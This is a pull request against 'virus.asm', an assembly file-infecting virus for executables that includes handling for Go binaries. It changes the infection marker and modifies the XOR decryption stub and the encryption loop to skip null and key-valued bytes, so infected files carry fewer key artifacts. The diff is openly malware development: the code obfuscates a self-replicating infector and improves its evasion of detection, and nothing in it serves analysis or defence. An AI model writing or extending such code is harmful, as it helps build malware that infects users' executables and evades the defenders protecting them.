### PR TITLE
Null-Preserving XOR Encryption

### DIFF
--- a/virus.asm
+++ b/virus.asm
@@ -75,7 +75,7 @@ RJMP = 4050                     ; holds jmp from end of virus to start of file
 ;;; virus constants
 VIRUS_STACK = 5000              ; number of stack bytes for virus activities
 GETDENTS_COUNT = 2048           ; number of bytes for storing directory entries
-VIRUS_IDENTIFIER = 0x0041534e   ; 'NSA', used to mark infected executables
+VIRUS_IDENTIFIER = 0x00434f52   ; 'ROC', used to mark infected executables
 GOBIN_IDENTIFIER = 0x00006f47   ; Go\x00\x00, PT_NOTE name field for Go binaries
 VIRUS_SIZE = 931                ; size of virus code, used to check if this is gen 0
 

--- a/virus.asm
+++ b/virus.asm
@@ -119,8 +119,9 @@ key:
 run_stub:                       ; will decrypt the following code
     pop r9                      ; get key to use in r9
 
-    mov r9, [r9]
+    mov r9, [r9]                ; r9 is address of key, access key at the addr
     jmp setup_decrypt+5
+
 setup_decrypt:
     dd 0x1baddeed               ; more junk code
     db 0xf9
@@ -136,7 +137,15 @@ decrypt:
     db 0xf0, 0xbf, 0x38, 0xe9   ; more junk code instructions
 
     lodsb                      ; load single byte from rsi to al
+    ; preserve null bytes
+    cmp al, 0x00
+    jz .store
+    cmp al, r9b
+    jz .store
+
+    ; otherwise xor
     xor al, r9b
+  .store:
     stosb                       ; store byte back at rsi
     loop decrypt+4
 
@@ -377,7 +386,14 @@ file_loop:
 
     .encrypt_virus:
     lodsb
+    cmp al, 0x00
+    jz .store_two
+    cmp al, bl
+    jz .store_two
+
     xor al, bl
+
+  .store_two:
     stosb
     loop .encrypt_virus
 


### PR DESCRIPTION
This switches the encryption routine to not XOR null bytes (or bytes that are the key) to leave less key artifacts in the infected file.